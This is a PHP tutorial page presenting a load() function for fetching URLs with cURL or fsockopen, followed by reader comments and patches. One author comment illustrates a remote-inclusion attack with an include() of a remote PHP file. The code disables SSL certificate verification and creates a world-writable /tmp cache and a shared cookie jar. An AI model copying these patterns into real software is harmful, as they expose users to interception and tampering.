load() Function for PHP - Fetch URL Content

I recently had to write a small script that fetches an XML file from the web. All it had to do was download a given URL and read its contents. To my great surprise, I found that downloading the file with my jx Ajax library was much easier than doing it in PHP.

PHP does make this look very easy, since functions like file_get_contents() support URLs. This code gets you the contents of a URL.

$contents = file_get_contents('http://example.com/rss.xml');

Unfortunately, this relies on PHP treating URLs like local files (the allow_url_fopen setting). That is considered a security risk, so many servers have disabled the feature. It is also not the most efficient way to fetch a URL, and submitting data with the POST method takes extra work because you have to build a stream context by hand.
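For reference, file_get_contents() can send a POST request when it is given a stream context, although this still only works where allow_url_fopen is enabled. The sketch below shows one way to build such a context. The helper name post_context_options() and the form fields are made up for illustration.

```php
<?php
// Hypothetical helper: builds the options array for stream_context_create()
// so that file_get_contents() sends a form-encoded POST request.
function post_context_options(array $fields) {
    return array(
        'http' => array(
            'method'  => 'POST',
            'header'  => "Content-Type: application/x-www-form-urlencoded\r\n",
            'content' => http_build_query($fields),
        ),
    );
}

$context_options = post_context_options(array('section' => 2, 'q' => 'php load'));

// The actual request only works when allow_url_fopen is enabled:
// if (ini_get('allow_url_fopen')) {
//     $context  = stream_context_create($context_options);
//     $contents = file_get_contents('http://example.com/rss.xml', false, $context);
// }
```

The request itself is left commented out so the snippet can be run on a server where URL access is disabled.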

Other Options - curl and fsockopen

PHP provides two other ways to fetch a URL: cURL and fsockopen(). But using either of them means writing a lot more code.
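To give a sense of how low-level the fsockopen() route is, the request has to be assembled by hand as a string before it is written to the socket. This is a minimal sketch of that one step. build_get_request() is a hypothetical name, and the request is modelled on the one load() sends in the code further down.

```php
<?php
// Hypothetical helper: assembles a bare HTTP/1.0 GET request for a URL.
function build_get_request($url) {
    $parts = parse_url($url);
    $path  = isset($parts['path']) ? $parts['path'] : '/';
    if (isset($parts['query'])) $path .= '?' . $parts['query'];

    $out  = "GET $path HTTP/1.0\r\n";
    $out .= "Host: {$parts['host']}\r\n";
    $out .= "Connection: Close\r\n";
    $out .= "\r\n"; // A blank line ends the request headers.
    return $out;
}

$request = build_get_request('http://example.com/rss.xml?section=2');

// Sending it would then look roughly like this:
// $fp = fsockopen('example.com', 80, $errno, $errstr, 30);
// if ($fp) {
//     fwrite($fp, $request);
//     $response = '';
//     while (!feof($fp)) $response .= fgets($fp, 128);
//     fclose($fp);
// }
```

Everything after that (splitting headers from the body, handling redirects, and so on) also has to be written by hand.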

load()

So I decided to create my own function that makes this much easier.

Features

Options

The first argument of this function is the URL to be fetched. The second argument is an optional associative array of options. The following keys are supported in this array.

return_info
    Possible values - true/false
    If this is true, the function will return an associative array rather than just a string. The array will contain 3 elements...
    headers
        An associative array containing all the headers returned by the server.
    body
        A string - the contents of the URL.
    info
        Some information about the fetch. This is the result returned by the 'curl_getinfo()' function. Supported only with Curl.
method
    Possible values - post/get
    Specifies the method to be used.
modified_since
    If this option is set, the 'If-Modified-Since' header will be used. This will make sure that the URL will be fetched only if it was modified.
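As a rough illustration of the modified_since option, the value is passed through strtotime() and formatted as an HTTP date before it is sent, so any date string that strtotime() understands should work. The helper name below is hypothetical. The formatting call is the same one that appears in the function's code.

```php
<?php
// Hypothetical helper showing how a modified_since value becomes a header line.
function if_modified_since_header($modified_since) {
    return "If-Modified-Since: " . gmdate('D, d M Y H:i:s \G\M\T', strtotime($modified_since));
}

$header_line = if_modified_since_header('2007-06-18 13:56:22 UTC');
echo $header_line . "\n"; // If-Modified-Since: Mon, 18 Jun 2007 13:56:22 GMT
```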

Examples

The code to fetch the contents of a URL will look like this...

$contents = load('http://example.com/rss.xml');

Simple, no? This will just return the contents of the URL. If you need to do more complex stuff, just use the second argument to pass more options...

$options = array(
	'return_info'	=> true,
	'method'		=> 'post'
);
$result = load('http://www.bin-co.com/rss.xml.php?section=2',$options);
print_r($result);

The output will be like this...

Array
(
    [headers] => Array
        (
            [Date] => Mon, 18 Jun 2007 13:56:22 GMT
            [Server] => Apache/2.0.54 (Unix) PHP/4.4.7 mod_ssl/2.0.54 OpenSSL/0.9.7e mod_fastcgi/2.4.2 DAV/2 SVN/1.4.2
            [X-Powered-By] => PHP/5.2.2
            [Expires] => Thu, 19 Nov 1981 08:52:00 GMT
            [Cache-Control] => no-store, no-cache, must-revalidate, post-check=0, pre-check=0
            [Pragma] => no-cache
            [Set-Cookie] => PHPSESSID=85g9n1i320ao08kp5tmmneohm1; path=/
            [Last-Modified] => Tue, 30 Nov 1999 00:00:00 GMT
            [Vary] => Accept-Encoding
            [Transfer-Encoding] => chunked
            [Content-Type] => text/xml
        )
    [body] => ... Contents of the Page ...
    [info] => Array
        (
            [url] => http://www.bin-co.com/rss.xml.php?section=2
            [content_type] => text/xml
            [http_code] => 200
            [header_size] => 501
            [request_size] => 146
            [filetime] => -1
            [ssl_verify_result] => 0
            [redirect_count] => 0
            [total_time] => 1.113792
            [namelookup_time] => 0.180019
            [connect_time] => 0.467973
            [pretransfer_time] => 0.468035
            [size_upload] => 0
            [size_download] => 2274
            [speed_download] => 2041
            [speed_upload] => 0
            [download_content_length] => 0
            [upload_content_length] => 0
            [starttransfer_time] => 0.826031
            [redirect_time] => 0
        )
)
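
With return_info enabled, the returned array can be checked before the body is used. The snippet below is only a sketch: it works on a hand-written sample shaped like the output above rather than on a live request, and the helper name is_xml_response() is an assumption for illustration.

```php
<?php
// Sample data shaped like the array returned with 'return_info' => true.
$result = array(
    'headers' => array('Content-Type' => 'text/xml', 'Pragma' => 'no-cache'),
    'body'    => '<rss></rss>',
    'info'    => array('http_code' => 200, 'content_type' => 'text/xml'),
);

// Hypothetical helper: true when the fetch succeeded and returned XML.
function is_xml_response(array $result) {
    $code = isset($result['info']['http_code']) ? $result['info']['http_code'] : 0;
    $type = isset($result['headers']['Content-Type']) ? $result['headers']['Content-Type'] : '';
    return $code == 200 && strpos($type, 'xml') !== false;
}

if (is_xml_response($result)) {
    echo strlen($result['body']) . " bytes of XML\n";
}
```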

Code

<?php
/**
 * See http://www.bin-co.com/php/scripts/load/
 * Version : 2.00.A
 */
function load($url,$options=array()) {
    
    $default_options = array(
        'method'        => 'get',
        'return_info'   => false,
        'return_body'   => true,
        'cache'         => false,
        'referer'       => '',
        'headers'       => array(),
        'session'       => false,
        'session_close' => false,
    );
    // Sets the default options.
    foreach($default_options as $opt=>$value) {
        if(!isset($options[$opt])) $options[$opt] = $value;
    }

    $url_parts = parse_url($url);
    $ch = false;
    $info = array(//Currently only supported by curl.
        'http_code'    => 200
    );
    $response = '';

    $send_header = array(
        'Accept' => 'text/*',
        'User-Agent' => 'BinGet/1.00.A (http://www.bin-co.com/php/scripts/load/)'
    ) + $options['headers']; // Add custom headers provided by the user.

    
    if($options['cache']) {
        $cache_folder = '/tmp/php-load-function/';
        if(isset($options['cache_folder'])) $cache_folder = $options['cache_folder'];
        if(!file_exists($cache_folder)) {
            $old_umask = umask(0); // Or the folder will not get write permission for everybody.
            mkdir($cache_folder, 0777);
            umask($old_umask);
        }

        $cache_file_name = md5($url) . '.cache';
        // joinPath() is a helper that is not defined in this listing; it has to be supplied separately.
        $cache_file = joinPath($cache_folder, $cache_file_name); //Don't change the variable name - used at the end of the function.

        if(file_exists($cache_file)) { // Cached file exists - return that.
            $response = file_get_contents($cache_file);

            //Separate header and content
            $separator_position = strpos($response,"\r\n\r\n");
            $header_text = substr($response,0,$separator_position);
            $body = substr($response,$separator_position+4);

            foreach(explode("\n",$header_text) as $line) {
                $parts = explode(": ",$line);
                if(count($parts) == 2) $headers[$parts[0]] = chop($parts[1]);
            }
            $headers['cached'] = true;

            if(!$options['return_info']) return $body;
            else return array('headers' => $headers, 'body' => $body, 'info' => array('cached'=>true));
        }
    }

    
    ///////////////////////////// Curl /////////////////////////////////////
    //If curl is available, use curl to get the data.
    if(function_exists("curl_init")
                and (!(isset($options['use']) and $options['use'] == 'fsocketopen'))) { //Don't use curl if it is specifically stated to use fsocketopen in the options

        if(isset($options['post_data'])) { //There is an option to specify some data to be posted.
            $page = $url;
            $options['method'] = 'post';

            if(is_array($options['post_data'])) { //The data is in array format.
                $post_data = array();
                foreach($options['post_data'] as $key=>$value) {
                    $post_data[] = "$key=" . urlencode($value);
                }
                $url_parts['query'] = implode('&', $post_data);

            } else { //It's a string
                $url_parts['query'] = $options['post_data'];
            }
        } else {
            if(isset($options['method']) and $options['method'] == 'post') {
                $page = $url_parts['scheme'] . '://' . $url_parts['host'] . $url_parts['path'];
            } else {
                $page = $url;
            }
        }

        if($options['session'] and isset($GLOBALS['_binget_curl_session'])) $ch = $GLOBALS['_binget_curl_session']; //Session is stored in a global variable
        else $ch = curl_init($url_parts['host']);

        curl_setopt($ch, CURLOPT_URL, $page) or die("Invalid cURL Handle Resource");
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); //Just return the data - not print the whole thing.
        curl_setopt($ch, CURLOPT_HEADER, true); //We need the headers
        curl_setopt($ch, CURLOPT_NOBODY, !($options['return_body'])); //The content - if true, will not download the contents. There is a ! operation - don't remove it.
        if(isset($options['method']) and $options['method'] == 'post' and isset($url_parts['query'])) {
            curl_setopt($ch, CURLOPT_POST, true);
            curl_setopt($ch, CURLOPT_POSTFIELDS, $url_parts['query']);
        }
        //Set the headers our spider sends
        curl_setopt($ch, CURLOPT_USERAGENT, $send_header['User-Agent']); //The Name of the UserAgent we will be using ;)
        $custom_headers = array("Accept: " . $send_header['Accept'] );
        if(isset($options['modified_since']))
            array_push($custom_headers,"If-Modified-Since: ".gmdate('D, d M Y H:i:s \G\M\T',strtotime($options['modified_since'])));
        curl_setopt($ch, CURLOPT_HTTPHEADER, $custom_headers);
        if($options['referer']) curl_setopt($ch, CURLOPT_REFERER, $options['referer']);

        curl_setopt($ch, CURLOPT_COOKIEJAR, "/tmp/binget-cookie.txt"); //If ever needed...
        curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
        curl_setopt($ch, CURLOPT_MAXREDIRS, 5);
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); //Note: this turns off SSL certificate verification.

        if(isset($url_parts['user']) and isset($url_parts['pass'])) {
            $custom_headers = array("Authorization: Basic ".base64_encode($url_parts['user'].':'.$url_parts['pass']));
            curl_setopt($ch, CURLOPT_HTTPHEADER, $custom_headers);
        }

        $response = curl_exec($ch);
        $info = curl_getinfo($ch); //Some information on the fetch

        if($options['session'] and !$options['session_close']) $GLOBALS['_binget_curl_session'] = $ch; //Don't close the curl session. We may need it later - save it to a global variable
        else curl_close($ch);  //If the session option is not set, close the session.

    //////////////////////////////////////////// FSockOpen //////////////////////////////
    } else { //If there is no curl, use fsocketopen - but keep in mind that most advanced features will be lost with this approach.
        if(isset($url_parts['query'])) {
            if(isset($options['method']) and $options['method'] == 'post')
                $page = $url_parts['path'];
            else
                $page = $url_parts['path'] . '?' . $url_parts['query'];
        } else {
            $page = $url_parts['path'];
        }

        if(!isset($url_parts['port'])) $url_parts['port'] = 80;
        $fp = fsockopen($url_parts['host'], $url_parts['port'], $errno, $errstr, 30);
        if ($fp) {
            $out = '';
            if(isset($options['method']) and $options['method'] == 'post' and isset($url_parts['query'])) {
                $out .= "POST $page HTTP/1.1\r\n";
            } else {
                $out .= "GET $page HTTP/1.0\r\n"; //HTTP/1.0 is much easier to handle than HTTP/1.1
            }
            $out .= "Host: $url_parts[host]\r\n";
            $out .= "Accept: $send_header[Accept]\r\n";
            $out .= "User-Agent: {$send_header['User-Agent']}\r\n";
            if(isset($options['modified_since']))
                $out .= "If-Modified-Since: ".gmdate('D, d M Y H:i:s \G\M\T',strtotime($options['modified_since'])) ."\r\n";

            $out .= "Connection: Close\r\n";

            //HTTP Basic Authorization support
            if(isset($url_parts['user']) and isset($url_parts['pass'])) {
                $out .= "Authorization: Basic ".base64_encode($url_parts['user'].':'.$url_parts['pass']) . "\r\n";
            }

            //If the request is post - pass the data in a special way.
            if(isset($options['method']) and $options['method'] == 'post' and !empty($url_parts['query'])) {
                $out .= "Content-Type: application/x-www-form-urlencoded\r\n";
                $out .= 'Content-Length: ' . strlen($url_parts['query']) . "\r\n";
                $out .= "\r\n" . $url_parts['query'];
            }
            $out .= "\r\n";

            fwrite($fp, $out);
            while (!feof($fp)) {
                $response .= fgets($fp, 128);
            }
            fclose($fp);
        }
    }

    
    //Get the headers in an associative array
    $headers = array();

    if($info['http_code'] == 404) {
        $body = "";
        $headers['Status'] = 404;
    } else {
        //Separate header and content
        if(!isset($info['header_size'])) { //Only curl reports a header size - otherwise find the blank line that ends the headers.
            $separator_position = strpos($response, "\r\n\r\n");
            $info['header_size'] = ($separator_position === false) ? strlen($response) : $separator_position + 4;
        }
        $header_text = substr($response, 0, $info['header_size']);
        $body = substr($response, $info['header_size']);

        foreach(explode("\n",$header_text) as $line) {
            $parts = explode(": ",$line);
            if(count($parts) == 2) $headers[$parts[0]] = chop($parts[1]);
        }
    }

    if(isset($cache_file)) { //Should we cache the URL?
        file_put_contents($cache_file, $response);
    }

    if($options['return_info']) return array('headers' => $headers, 'body' => $body, 'info' => $info, 'curl_handle'=>$ch);
    return $body;
}
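
The listing calls joinPath() when it builds the cache file name, but that helper is not included here, so the cache option will fail with an undefined-function error unless it is supplied. A minimal stand-in could look like the sketch below. It assumes the helper only needs to join a folder and a file name with a single slash; the original helper may well do more.

```php
<?php
// Assumed stand-in for the joinPath() helper used by load(); not the original implementation.
if (!function_exists('joinPath')) {
    function joinPath($folder, $file) {
        return rtrim($folder, '/') . '/' . ltrim($file, '/');
    }
}

echo joinPath('/tmp/php-load-function/', 'abc.cache') . "\n";
```

The function_exists() guard keeps the stand-in from clashing with a real joinPath() if one is already loaded.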

License

BSD License

Comments

Anonymous at 27 Oct, 2007 12:14
Thanks ! the script is easy to use
What is a URL? at 23 Nov, 2007 03:45
Does this retrieve all the HTML of the URL in question? If so, then how does it differ from file()?
Binny V A at 25 Nov, 2007 06:22
In some servers, file() cannot fetch an URL. There is an option in PHP to disable it. Since it is considered to be a security threat, many admins have disabled it. In such cases, you can use this function.
Anonymous at 12 Jan, 2008 06:24
wow! Straight forward programming, good documentation ... a pleasure to use =)
Anonymous at 20 Feb, 2008 09:39
Awesome function. Had to change some small stuff thou cause i got some weird numbers in my $body output.

$body = substr($response,$separator_position+4);
i hade to change to:
$body = substr($response,$separator_position+9);

and then a
$body = substr($body,0,-5);
cause there was a 0 at the end.

otherwise awesome job! =)

-gob
Ashkan at 01 Mar, 2008 01:37
great! thanks a lot. it make me faster doing my works!
Anonymous at 05 Mar, 2008 11:34
hi
how can i save the contents of the url or download it using this script
i need to download it and save it like HTML file ..

example : when you clicl file > save as .. the page will saved in HTML file Whit Images ..
Brad at 15 Mar, 2008 02:53
And once again simply awesome - thanks!
Anonymous at 16 Mar, 2008 06:35
what would be the code if i want to fetch full wvm path from zdsahre.net?
Anonymous at 18 Mar, 2008 11:45
thank you very very much, it solves all my problems, simply..
Stumbled upon at 05 Jun, 2008 05:34
This is just excellent, exactly what I needed. Thanks for sharing!
Tim at 05 Jun, 2008 12:18
Very nice, thx.
Anonymous at 02 Jul, 2008 06:42
great snippet...consider encapsulating it in a class for easy consumption.
arun dwivedi at 07 Jul, 2008 01:46
hi arun
arun dwivedi at 07 Jul, 2008 09:19
how can use rollback with php function
dheen at 15 Jul, 2008 09:17
i just copied the above coding...and i was running it but codings were printed in that page...pls help me..
do i need to make any change..?
dheen at 15 Jul, 2008 10:00
what does $option do in the first line...do i need to call the function load from outside..
if i need to call that what i should pass to the $options..
Adrian at 21 Jul, 2008 12:47
Great script.

Thanks and really useful.

One thing it doesn't handle, is fetching code on different ports. I'm trying to pull a file on port 8080.

Any ideas?
Mark at 29 Jul, 2008 03:16
Thanks for posting this!
Roshan Bhattarai at 12 Sep, 2008 04:10
hey bini......thanks for sharing such a great script.....cheers
Anonymous at 12 Sep, 2008 04:32
Why is file_get_contents a security threat?
Binny V A at 12 Sep, 2008 12:10
The handling of url as a local file is a security threat - not that function. For example, an attacker could add the code ...
include('http://remotesite.com/spamming_php_file.txt'); - it will be executed as PHP code if this feature is turned on.
Anonymous at 14 Jan, 2009 04:08
Could you elaborate? Does this script pose a security threat as well? Is there a risk of injection attacks? -Thanks!
tozo at 19 Sep, 2008 12:58
Hi.

I have one question. I would like to execute form on anothere server.
For on other servers pages looks something like this :

<form id="calculate_score" action="" method="post">
<input type="hidden" name="cmd" value="calculate" />
<input type="text" id="month_payment" name="score" class="input" value="" />
<input type="image" src="/dsg/sl/calculate.gif" class="button" />
</form>

Is it posible to send data with load function (post method) so I could enter values manualy and just retreive the result.

Thnx.
Anonymous at 28 Sep, 2008 11:59
very good piece of code! works like a charm! thank you
cartagena at 13 Oct, 2008 08:29
Perfect,,,, a great alternative to file_get_contents.... That's why i love PHP.
Thanks
Anonymous at 06 Nov, 2008 05:04
Great work!
Anonymous at 19 Nov, 2008 10:45
Thank you. Saved me probably hours of programming to get some JSON stream data on my webpage
rahul at 08 Dec, 2008 02:37
I HAVE ONE QUESTION:SUPPOSE I AM RUNNING A PARTICULAR PAGE ON ONE SERVER AND ANOTHER ON ANOTHER SERVER,IF I WANT TO GO FROM ONE PAGE OF ONE SERVER TO OTHER PAGE THAT IS RUNNING ON ANOTHER SERVER HOW CAN I MAINTAIN THE SESSION
Paul Tarjan at 23 Dec, 2008 11:02
To deal with other ports, change the line:
---
$fp = fsockopen($url_parts['host'], 80, $errno, $errstr, 30);
---

to

---
if(!isset($url_parts['port'])) $url_parts['port'] = 80;

$fp = fsockopen($url_parts['host'], $url_parts['port'], $errno, $errstr, 30);
---
Jani at 29 Jan, 2009 10:14
Hi!

Great work!
I have one note:
if I use it and has to redirect it, the new url's header in $results['body'] of top as plain text , and not in $results['headers']. But $results['info'] is OK, but not full (Content-Length, Date, etc...).
Example:
$result = load('http://google.com',$options); //redirect to www.google.com
print_r($results);

Sorry my bad english.
Binny V A at 31 Jan, 2009 05:21
I have update the script to the latest version - it has fixed this issue. And added a lot of new features too.
Florian at 26 Feb, 2009 02:28
Thanks, this is great, and easy!
Anonymous at 18 Mar, 2009 12:04
WOW ... AMAZING FUNCTION. Great work !!!
a1291762 at 14 Apr, 2009 08:25
I tried to use this and found out that without cURL it's a bit limited. I have corrected some of the limitations.

The patch allows fsockopen to connect to a https:// URL. It also calculates the header_size so the header/body splitting/parsing code works.

http://yasmar.net/load_fix_fsockopen.diff
a1291762 at 16 Apr, 2009 09:27
Some more patches that I've made...

Fix the sending of headers (while I didn't test it, the curl code didn't seem right, the fsockopen code didn't handle it at all).
http://yasmar.net/fix_sending_headers.diff

Allow receiving multiple headers with the same name (eg. Set-Cookie: appear multiple times when multiple cookies are being set). This leaves the $headers['header'] behavior intact and simply changes the value from a string to an array of strings.
http://yasmar.net/multiple_headers_receive.diff

Retrieve the HTTP response code when using fsockopen.
http://yasmar.net/fsockopen_http_response.diff

Send multiple headers with the same name (a mirror implementation of the receiving multiple headers patch).
http://yasmar.net/multiple_headers_send.diff
Binny V A at 22 Apr, 2009 11:37
Thanks! I'll review the code and add these patches into function. Thanks for sharing.
a1291762 at 22 Apr, 2009 08:56
I'm now retrieving an attachment and the end of the headers is not an empty line but a line with a single piece of white space. This patch updates the fsockopen code to check for 'only whitespace' instead of 'empty line' when finding the end of the headers.

http://yasmar.net/load_fsockopen_non_empty_line.diff
a1291762 at 23 Apr, 2009 12:10
Oops. Turns out that last patch was an incorrect fix for a parsing bug. Here's a patch (on top of that patch) that corrects the situation. Embarrassingly, this logic was already there (up in the curl bit). With the non_empty_line patch you can download text attachments. With this patch on top, you can also download binary attachments.

http://yasmar.net/load_fsockopen_headers_end.diff
Desi at 24 Apr, 2009 08:26
alienlinkz@gmail.com
can someone tell me how to use this script
please
I am trying to fetch new from yahoo to my website.
Matt at 28 Apr, 2009 01:27
Hi there

I have this working well, retrieving text. However, I have been trying to also use it for retrieving a PNG from a remote server and then saving this to my local server and it doesn't work. I can get it to work using feof and feof really well, but it doesn't work on alls servers which is why I am trying to use this.

Could someone please provide me with a sample of what to do to get this to work please? It saves the data, but isn't being recognised as a PNG file. I guess the data is corrupt for some reason.

Oh, and a1291762, is there any chance you can link to the entire updated script rather than just diffs?

Thanks
Matt at 28 Apr, 2009 01:30
Sorry, I meant fopen and fwrite.
a1291762 at 29 Apr, 2009 12:22
Matt, perhaps the file is being "converted" when writing (ie. automatic line ending conversion).

My code does not actually write out the file at any point. It simply fetches and then serves to the browser (effectively acting as a proxy). The code looks like this.

# Fetch the attachment (needs cookies)
$attachment = load($this->source_url, array('return_info' => true,
'headers' => array('Cookie' => session()->cookie())));

# Serve up the headers that I got (at least some of them will be important)
foreach ($attachment['headers'] as $header => $data) {
# Any text/* types get served as text/plain.
# I HATE it when the browser doesn't let me view TEXT files!
if ($header == 'Content-Type' && preg_match('/^text\//', $data)) {
header('Content-Type: text/plain');
continue;
}
if (!is_array($data)) {
$data = array($data);
}
foreach ($data as $value) {
header($header.': '.$value);
}
}

# Now serve up the contents of the file.
echo $attachment['body'];


The full script I have is here: http://yasmar.net/load.php. Note that this is not quite original + patches. There is a raw POST hack I stuck in so I could upload files to a remote server but it's only for the fsockopen case. I was planning on making it work with curl before posting as a patch.
a1291762 at 30 Apr, 2009 12:18
This patch makes the fsockopen case able to use the post_data feature (no sense in keeping it curl-only right?).
http://yasmar.net/fsockopen_post_data.diff

This adds support for multipart-encoded POSTs (cURL and fsockopen). This allows you to upload files.
http://yasmar.net/multipart_post.diff

This makes use of two helper functions (sourced from around the internets). It was designed around fsockopen's requirements and retrofitted to curl. fsockopen needs more data than curl does so the 'multipart_data' field you are expected to fill out has more options than you might expect (the same input is used so that the 'use curl or fall back to fsockopen' logic can still work).

Anyway, here is an example of how to upload with this new feature (in this case, attaching a file to a JIRA task).

$url = 'https://'.JIRA_HOST.'/secure/AttachFile.jspa';
$upload = array('filename.1' => array('filename' => $file_name, 'type' => $mime_type, 'binary' => true, 'contents' => $file_contents),
'filename.2' => array('filename' => '', 'type' => 'application/octet-stream'),
'filename.3' => array('filename' => '', 'type' => 'application/octet-stream'),
'comment' => array(),
'commentLevel' => array(),
'id' => array('contents' => $id),
'Attach' => array('contents' => 'Attach'));
load($url, array('headers' => array('Cookie' => $cookies),
'method' => 'post', 'multipart_data' => $upload));

Just for Matt, the whole enchilada can be found here.
http://yasmar.net/load.php.txt

Note that I'm not interested in maintaining a fork or anything so don't ask me for support. This was tested with both cURL and fsockopen but only for the case presented here (attaching a file to a JIRA task).
prem ypi at 16 May, 2009 01:48
This is really safe method to use now. Fetching using the default php function has few security flaws. May be you should try to commit your piece of code in the default fetch (or have separate function as 'safe_load' etc.
jaswant tak at 25 May, 2009 01:22
Very nice mate,

A great help

Thanks a lot.

cheers
Anonymous at 25 Jun, 2009 01:17
Thanks, great function!